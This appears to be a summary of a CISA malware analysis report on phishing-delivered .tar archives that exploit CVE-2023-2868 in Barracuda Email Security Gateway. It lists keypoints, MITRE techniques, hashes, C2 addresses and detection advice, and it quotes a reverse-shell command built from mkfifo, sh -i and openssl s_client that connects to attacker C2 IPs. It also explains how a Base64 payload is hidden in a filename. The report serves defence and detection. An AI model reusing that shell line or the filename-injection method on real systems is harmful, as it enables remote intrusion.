MAR-10454006-r3.v1 Exploit Payload Backdoor | CISA

CISA analyzed 14 samples of Barracuda exploit payloads that leverage CVE-2023-2868 to perform command injection and install Base64-encoded reverse shells on affected Barracuda Email Security Gateway appliances. The reverse shells create OpenSSL-based encrypted connections to C2 servers (notably 107.148.223.196 and 107.148.219.54) after being delivered via phishing emails with malicious .tar attachments.

Keypoints

  • CISA obtained and analyzed 14 malware samples containing exploit payloads and reverse shell backdoors targeting Barracuda Email Security Gateway (ESG).
  • The attacks exploit CVE-2023-2868 (command injection) in Barracuda ESG versions 5.1.3.001–9.2.0.006 to execute malicious commands on the appliance.
  • Actors delivered the payloads via phishing emails carrying .tar attachments; one filename inside the archive contained a Base64-encoded payload that triggered the exploit when processed.
  • Decoded payloads execute shell commands that create a named pipe (/tmp/p) and spawn an interactive shell piped through openssl s_client to C2 IPs 107.148.223.196 (ports 8080/443) and 107.148.219.54:443.
  • Multiple TAR samples (e.g., snapshot.tar, snapshot0.tar) drop a small ASCII payload file whose filename contains the Base64-encoded exploit; two example dropped hashes are 2a5de691243f…cd40b and 949d4b01f312…df788.
  • YARA rules (CISA_10454006_08/09 and CISA_10452108_03) detect these reverse shell samples; ESET flags them as Linux/Exploit.CVE-2023-2868.A.
  • IOCs include numerous SHA256 hashes, the C2 IPs 107[.]148[.]223[.]196 and 107[.]148[.]219[.]54, and malicious .tar filenames embedding the exploit payload.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – The vulnerability CVE-2023-2868 was exploited to run arbitrary commands on the Barracuda ESG (‘…the payload triggers a command injection (exploiting CVE-2023-2868)…’).
  • [T1566] Phishing – Initial delivery used phishing emails with malicious .tar attachments to deliver the exploit payload (‘…delivered this payload to the victim via a phishing email with a malicious .tar attachment.’).
  • [T1105] Ingress Tool Transfer – Malicious .tar archives contained files/filenames that dropped the encoded payloads onto the appliance (‘…a file contains a malicious payload inside its filename that exploits CVE-2023-2868.’).
  • [T1059] Command and Scripting Interpreter – The exploit runs shell commands (setsid, mkfifo, sh -i) to create an interactive reverse shell (‘setsid sh -c "mkfifo /tmp/p;sh -i </tmp/p 2>&1|openssl s_client …;rm /tmp/p"’).
  • [T1573] Encrypted Channel – The reverse shells use OpenSSL (openssl s_client -quiet -connect) to establish encrypted C2 communications to attacker-controlled IPs (‘…|openssl s_client -quiet -connect 107[.]148[.]223[.]196:8080 >/tmp/p 2>/dev/null;rm /tmp/p’).

Indicators of Compromise

  • [SHA256 hashes] sample identifiers – 2a860849a9e68df0053556b85f20010a1384b4c87594ba4f9bb3e1b1d287b095, 0b917d945a7491869fa5003f6b85c09f5f45795a7852a8b63ba1abdc9797d6a6, and 12 more hashes.
  • [IP addresses] C2 servers – 107[.]148[.]223[.]196, 107[.]148[.]219[.]54 (used by openssl s_client connections on ports 8080 and 443).
  • [File names] malicious archive and dropped filenames – snapshot.tar, snapshot0.tar, and embedded payload filenames beginning with “abcdefg…” that contain Base64-encoded exploit payloads.
  • [File types] archive delivery – POSIX tar archives (GNU) used to deliver and drop the payloads (examples: snapshot.tar, snapshot0.tar).

Attackers packaged a Base64-encoded shell payload inside the filename of files within .tar archives attached to phishing emails. When the exploit triggers (CVE-2023-2868), the encoded block is decoded and executed; that block references an inner Base64 payload which decodes to a shell command that creates a named pipe and runs an interactive shell.

The decoded commands use setsid to detach the shell into its own session and mkfifo to create the named pipe /tmp/p, then pipe sh -i through openssl s_client with the -quiet flag to connect to attacker C2 hosts (observed: 107.148.223.196 on ports 8080 and 443, and 107.148.219.54 on port 443). The shell reads its input from the pipe with stderr merged into stdout, openssl writes its output back to the pipe with its own errors suppressed to /dev/null, and /tmp/p is removed when the session ends.

CISA supplied YARA rules (e.g., CISA_10454006_08/09 and CISA_10452108_03) to detect these reverse-shell-in-filename artifacts and published sample SHA256 hashes; ESET flags the samples as Linux/Exploit.CVE-2023-2868.A. Analysts should scan archives for filenames containing Base64 strings, monitor for mkfifo/setsid/openssl s_client usage, and block or investigate connections to the listed C2 IPs.

Read more: https://www.cisa.gov/news-events/analysis-reports/ar23-209c